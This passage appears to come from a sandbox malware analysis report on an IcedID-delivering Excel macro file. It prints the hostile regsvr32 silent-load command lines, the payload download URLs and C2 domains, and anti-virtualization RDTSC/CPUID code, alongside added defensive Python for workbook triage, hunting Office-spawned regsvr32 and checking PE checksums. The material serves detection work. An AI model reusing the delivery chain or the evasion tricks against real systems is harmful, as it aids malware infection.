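        if is_auto_run_name(name):
            result["auto_run"].append({
                "name": name,
                "target": (dn.text or "").strip(),
                # hidden="1" is a common trick to keep the name out of the Name Manager
                "hidden": dn.get("hidden") == "1",
            })
    return result


if __name__ == "__main__":
    print(triage_workbook(build_sample_container()))
```

        Pass the raw bytes of a suspect file to triage_workbook; an Auto_Open entry is the cell to start reading macro formulas from (here Sheet3!$CA$13), and a hidden="1" attribute on that name or a macro sheet part under xl/macrosheets/ are both reasons to treat the file as hostile before any dynamic analysis.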
        Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 (date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240)
        Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 (same rule metadata as above)
        Source: 4.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 (same rule metadata as above)
        Source: 00000004.00000002.2104111082.0000000000190000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_IcedID_GZIP_LDR_202104 (same rule metadata as above)
        Source: regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
        Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$LL52387-01M4205301.xlsm
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRE13A.tmp
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Note: of the three module names handed to regsvr32 (XRAY.dll, XTOWN.dll, XZIBIT.dll) only XTOWN.dll appears among the files EXCEL.EXE dropped, so only that regsvr32 instance (PID 2380 in the Yara match above) ends up running IcedID. The relative path ..\XTOWN.dll, taken from the document's folder on the Desktop (see the ~$ lock file above), is consistent with the drop location C:\Users\user\XTOWN.dll.
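        The process tree above is the behaviour the "Microsoft Office Product Spawning Windows Shell" Sigma signature in the overview keys on, and the command line adds two more tells: the silent switch and a relative module path. The following is an added example of that detection logic written as a small hunt over process-creation telemetry; it is not part of the report or of Joe Sandbox. The ProcessEvent records, the field names and the sample events are constructed, the first three of which mirror the report's process tree.

```python
"""Added example (not from the report): flag Office applications launching
regsvr32 to silently register a module from a relative or unusual path."""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
# regsvr32 accepts switches with "-" or "/"; "-s" / "/s" / "-silent" all suppress dialogs.
SILENT_SWITCH = re.compile(r"(?:^|\s)[-/](?:s|silent)(?=\s|$)", re.IGNORECASE)
ABSOLUTE_PATH = re.compile(r"^(?:[A-Za-z]:\\|\\\\)")


@dataclass(frozen=True)
class ProcessEvent:
    """Constructed process-creation record; real sources (Sysmon 1, EDR) carry the same fields."""
    parent_image: str
    image: str
    command_line: str


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def regsvr32_module(command_line):
    """First non-switch argument after the program name, with quotes removed; None if absent."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]
    for tok in tokens[1:]:
        if tok.startswith(("-", "/")):
            continue
        return tok
    return None


def triage(event):
    """Reasons a regsvr32 launch is suspicious; empty list for any other image."""
    reasons = []
    if basename(event.image) != "regsvr32.exe":
        return reasons
    if basename(event.parent_image) in OFFICE_IMAGES:
        reasons.append("office-parent")
    if SILENT_SWITCH.search(event.command_line):
        reasons.append("silent")
    module = regsvr32_module(event.command_line)
    if module is not None:
        if not ABSOLUTE_PATH.match(module):
            reasons.append("relative-path")       # "..\XTOWN.dll": resolved against the parent's CWD
        if not module.lower().endswith(".dll"):
            reasons.append("non-dll-name")        # e.g. a cached download such as lsdfik[1].fml
        if re.match(r"^[A-Za-z]:\\users\\", module, re.IGNORECASE):
            reasons.append("user-profile-path")
    return reasons


def hunt(events):
    """Alert when an Office process starts regsvr32 and at least one more indicator is present."""
    hits = []
    for event in events:
        reasons = triage(event)
        if "office-parent" in reasons and len(reasons) > 1:
            hits.append((event, reasons))
    return hits


EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
REGSVR32 = r"C:\Windows\System32\regsvr32.exe"

# Constructed telemetry. The first three lines mirror the report's process tree.
SAMPLE_EVENTS = [
    ProcessEvent(EXCEL, REGSVR32, r"regsvr32 -silent ..\XRAY.dll"),
    ProcessEvent(EXCEL, REGSVR32, r"regsvr32 -silent ..\XTOWN.dll"),
    ProcessEvent(EXCEL, REGSVR32, r"regsvr32 -silent ..\XZIBIT.dll"),
    # Installer registering a DLL by absolute path: silent, but not from Office.
    ProcessEvent(r"C:\Windows\System32\msiexec.exe", REGSVR32,
                 r'"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Vendor\vendor.dll"'),
    # Office parent but an absolute, non-silent registration of a system DLL: one reason only.
    ProcessEvent(EXCEL, REGSVR32, r"regsvr32 C:\Windows\System32\scrrun.dll"),
]


if __name__ == "__main__":
    for event, reasons in hunt(SAMPLE_EVENTS):
        print(event.command_line, reasons)
```

        On the sample events only the three Excel-spawned lines fire; the msiexec line is silent but has no Office parent, and the last line has an Office parent but nothing else. Requiring a second indicator keeps the rule from firing on every add-in that registers itself from Excel, while a relative path or a non-.dll name from an Office parent is rare enough in most fleets to page on.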
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: LL52387-01M4205301.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: LL52387-01M4205301.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
        Source: LL52387-01M4205301.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: LL52387-01M4205301.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: XTOWN.dll.0.dr | Static PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: lsdfik[1].fml.0.dr | Static PE information: real checksum: 0x1baf8 should be: 0x19d85
        Note: "real checksum" is the value stored in the optional header's CheckSum field (0x1baf8) and "should be" the value computed over the file (0x19d85). The field is only enforced by the loader for drivers and a few system images, so a mismatch mostly says the file was patched or built by a toolchain that does not fix the field up; it is a weak indicator by itself, and the identical values on both copies simply confirm they are the same file.
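        Reproducing that "should be" value takes only the imagehlp checksum algorithm (sum the file as dwords with end-around carry, skip the CheckSum field itself, fold to 16 bits, add the file length). The block below is an added example, not part of the report or of Joe Sandbox: it implements that computation and, because the sample is not available here, checks it against a constructed minimal PE32+ image built inline, first with a correct field and then with the report's stored value 0x1baf8 written in.

```python
"""Added example (not from the report): recompute a PE header CheckSum the way
imagehlp's MapFileAndCheckSum does and compare it with the stored field."""
import struct


def checksum_field_offset(data):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum (offset 64 in both PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    return e_lfanew + 4 + 20 + 64  # Signature + IMAGE_FILE_HEADER + CheckSum offset


def pe_checksum(data):
    """32-bit one's-complement style sum of the file, skipping the CheckSum dword,
    folded to 16 bits, plus the file length."""
    skip = checksum_field_offset(data)
    if skip % 4:
        raise ValueError("CheckSum field is not dword-aligned")
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for offset in range(0, len(padded), 4):
        if offset == skip:
            continue
        total += struct.unpack_from("<I", padded, offset)[0]
        if total > 0xFFFFFFFF:                       # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def verify_checksum(data):
    """(stored, computed, match). A stored value of 0 means 'not set' and is common."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = pe_checksum(data)
    return stored, computed, stored == computed


def build_sample_pe(stored_checksum=None):
    """Constructed minimal PE32+ DLL (headers plus one section) for offline use.
    With stored_checksum=None the correct value is written into the header."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)
    # Machine=AMD64, 1 section, SizeOfOptionalHeader=240, Characteristics=EXECUTABLE|LARGE_ADDRESS_AWARE|DLL
    file_header = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)             # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1000)            # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x180000000)       # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)    # SectionAlignment, FileAlignment
    struct.pack_into("<I", opt, 56, 0x2000)            # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x200)             # SizeOfHeaders
    struct.pack_into("<I", opt, 64, stored_checksum or 0)  # CheckSum
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = dos + b"PE\0\0" + file_header + bytes(opt) + section
    image = bytearray(headers + b"\0" * (0x200 - len(headers)) + bytes(range(256)) * 2)
    if stored_checksum is None:
        struct.pack_into("<I", image, checksum_field_offset(image), pe_checksum(bytes(image)))
    return bytes(image)


if __name__ == "__main__":
    print(verify_checksum(build_sample_pe()))
    print(verify_checksum(build_sample_pe(stored_checksum=0x1BAF8)))
```

        verify_checksum on a real dropped file returns the same pair of numbers the report prints; on the constructed image it reports a match, and writing 0x1baf8 into the field reproduces a mismatch without changing the computed value, since the field is skipped during the sum. Note the design choice of skipping only the CheckSum dword and summing everything else, including overlay data after the last section: appending bytes to a file therefore changes the result, which is why re-signed or padded samples always show a mismatch unless the field is regenerated.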

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (recorded 11 times)

        Malware Analysis System Evasion:

        Contains functionality to detect hardware virtualization (CPUID execution measurement)
        Source: C:\Windows\System32\regsvr32.exe  Code function: 4_2_001B1E50
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Windows\System32\regsvr32.exe  RDTSC instruction interceptor: first address: 00000000001B1E71, second address: 00000000001B1E96, instructions:
            0x00000000 rdtsc
            0x00000002 dec eax
            0x00000003 shl edx, 20h
            0x00000006 dec eax
            0x00000007 or eax, edx
            0x00000009 dec esp
            0x0000000a mov eax, eax
            0x0000000c xor ecx, ecx
            0x0000000e mov eax, 00000001h
            0x00000013 cpuid
            0x00000015 mov dword ptr [esp+20h], eax
            0x00000019 mov dword ptr [esp+24h], ebx
            0x0000001d mov dword ptr [esp+28h], ecx
            0x00000021 mov dword ptr [esp+2Ch], edx
            0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exe  RDTSC instruction interceptor: first address: 00000000001B1EAB, second address: 00000000001B1EB8, instructions:
            0x00000000 rdtsc
            0x00000002 dec eax
            0x00000003 shl edx, 20h
            0x00000006 nop
            0x00000007 dec eax
            0x00000008 or eax, edx
            0x0000000a dec eax
            0x0000000b mov ecx, eax
            0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exe  Code function: 4_2_001B2434 rdtsc 4_2_001B2434
        Source: C:\Windows\System32\regsvr32.exe  Code function: GetAdaptersInfo,GetAdaptersInfo,4_2_001B27BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp  Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp  Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp  Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp  Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp  Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp  Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp  Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exe  Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exe  Network Connect: 104.21.37.209 80
        Source: C:\Windows\System32\regsvr32.exe  Domain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exe  Domain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exe  Network Connect: 13.224.92.73 187
        Source: C:\Windows\System32\regsvr32.exe  Code function: 4_2_001B22DC LookupAccountNameW,4_2_001B22DC

        Stealing of Sensitive Information:

        Yara detected IcedID
        Source: Yara match  File source: dump.pcap, type: PCAP
        Source: Yara match  File source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match  File source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY

        Remote Access Functionality:

        Yara detected IcedID
        Source: Yara match  File source: dump.pcap, type: PCAP
        Source: Yara match  File source: 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match  File source: Process Memory Space: regsvr32.exe PID: 2380, type: MEMORY

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Scripting¹ | Path Interception | Process Injection¹¹ | Masquerading¹²¹ | OS Credential Dumping | Security Software Discovery²¹¹ | Remote Services | Archive Collected Data¹ | Exfiltration Over Other Network Medium | Encrypted Channel¹² | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Exploitation for Client Execution⁴³ | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools¹ | LSASS Memory | Process Discovery¹ | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer¹⁴ | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection¹¹ | Security Account Manager | Account Discovery¹ | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol³ | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting¹ | NTDS | System Owner/User Discovery¹ | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol¹²⁴ | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr32¹ | LSA Secrets | Remote System Discovery¹ | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery¹ | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery¹ | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery²² | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

        Behavior Graph

        Behavior Graph ID: 444806
        Sample: LL52387-01M4205301.xlsm
        Startdate: 06/07/2021
        Architecture: WINDOWS
        Score: 100
        Sample-level signatures: Found malware configuration; Document exploit detected (drops PE files); Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 6 other signatures
        Process: EXCEL.EXE (started; node counters 53, 26)
            Contacted: uppercilio.fun 172.67.146.88, ports 49169 -> 80, CLOUDFLARENETUS, United States; voopeople.fun 172.67.194.117, ports 49168 -> 80, CLOUDFLARENETUS, United States; thousandsyears.download 172.67.198.51, ports 49167 -> 80, CLOUDFLARENETUS, United States
            Dropped: C:\Users\user\XTOWN.dll (PE32+); C:\Users\user\AppData\Local\...\lsdfik[1].fml (PE32+)
            Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
            Child processes: regsvr32.exe (started); regsvr32.exe (started; node counter 4); regsvr32.exe (started)
        Process: regsvr32.exe (first child)
            Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements
        Process: regsvr32.exe (second child)
            Contacted: astrocycle.download 104.21.37.209, ports 49171 -> 80, CLOUDFLARENETUS, United States; dr49lng3n1n2s.cloudfront.net 13.224.92.73, ports 49170 -> 443, AMAZON-02US, United States; 2 other IPs or domains

        Screenshots


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        Source | Detection | Scanner | Label
        astrocycle.download | 1% | Virustotal |

        URLs

        Source | Detection | Scanner | Label
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom | 0% | URL Reputation | safe
        https://www.buzzsprout.com; | 0% | Avira URL Cloud | safe
        http://astrocycle.download/ | 1% | Virustotal |
        http://astrocycle.download/ | 0% | Avira URL Cloud | safe
        http://crl.sca1b.amazontrus | 0% | URL Reputation | safe
        http://ocsp.sca1b.amazontrust.com06 | 0% | URL Reputation | safe
        http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
        http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation | safe
        http://uppercilio.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
        https://prod-us-west-2.csp-report.marketing.aws.dev/submit | 0% | Avira URL Cloud | safe
        http://thousandsyears.download/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
        https://amazonwebservices.d2.sc.omtrdc.net | 0% | Avira URL Cloud | safe
        http://www.%s.comPA | 0% | URL Reputation | safe
        https://112-tzm-766.mktoutil.com | 0% | Avira URL Cloud | safe
        https://download.stormacq.com/aws/podcast/ | 0% | Avira URL Cloud | safe
        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
        astrocycle.download | 0% | Avira URL Cloud | safe
        https://chtbl.com | 0% | Avira URL Cloud | safe
        https://amazonwebservicesinc.tt.omtrdc.net | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        uppercilio.fun | 172.67.146.88 | true | false | | unknown
        thousandsyears.download | 172.67.198.51 | true | false | | unknown
        voopeople.fun | 172.67.194.117 | true | false | | unknown
        astrocycle.download | 104.21.37.209 | true | true | | unknown
        dr49lng3n1n2s.cloudfront.net | 13.224.92.73 | true | false | | high
        aws.amazon.com | unknown | unknown | false | | high

                  Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://astrocycle.download/ | true | Virustotal: 1%; Avira URL Cloud: safe | unknown
        http://uppercilio.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
        http://thousandsyears.download/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
        astrocycle.download | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://www.linkedin.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://a0.awsstatic.com/libra/1.0.385/directories | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp | false | | high
        https://c0.b0.p.awsstatic.com | regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
        https://api.regional-table.region-services.aws.a2z.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://a0.awsstatic.com/libra/1.0.385/librastandardlib | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/ar/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
        https://a0.p.awsstatic.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/cn/?nc1=h_ls | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/ru/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://www.buzzsprout.com; | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
        https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2104184000.00000000002AE000.00000004.00000020.sdmp | false | | high
        https://i18n-string.us-west-2.prod.pricing.aws.a2z.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/ru/?nc1=h_ls | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://docs.aws.amazon.com/index.html?nc2=h_ql_doc | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/ar/?nc1=h_ls | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://p.adsymptotic.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/th/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://docs.aws.amazon.com | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        http://www.windows.com/pctv. | regsvr32.exe, 00000004.00000002.2106683153.0000000003090000.00000002.00000001.sdmp | false | | high
        https://aws.amazon.com/marketplace/?nc2=h_mo | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://d2a6igt6jhaluh.cloudfront.net | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2101018272.00000000002D6000.00000004.00000001.sdmp | false | | high
        http://crl.sca1b.amazontrus | regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
        http://ocsp.sca1b.amazontrust.com06 | regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
        https://console.aws.amazon.com/support/home/?nc2=h_ql_cu | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://dftu77xade0tc.cloudfront.net | regsvr32.exe, 00000004.00000003.2101006177.00000000035AB000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109107850.00000000035A0000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/search/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/?nc2=h_lg | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        http://ocsp.rootca1.amazontrust.com0: | regsvr32.exe, 00000004.00000002.2104193166.00000000002BD000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
        https://console.aws.amazon.com/support/home/?nc1=f_dr | regsvr32.exe, 00000004.00000002.2109135626.00000000035AC000.00000004.00000001.sdmp | false | | high
        https://aws.amazon.com/vi/ | regsvr32.exe, 00000004.00000003.2100636607.00000000035B8000.00000004.00000001.sdmp | false | | high
        http://crl.rootg2.amazontrust.com/rootg2.crl0 | regsvr32.exe, 00000004.00000002.2104206264.00000000002D7000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
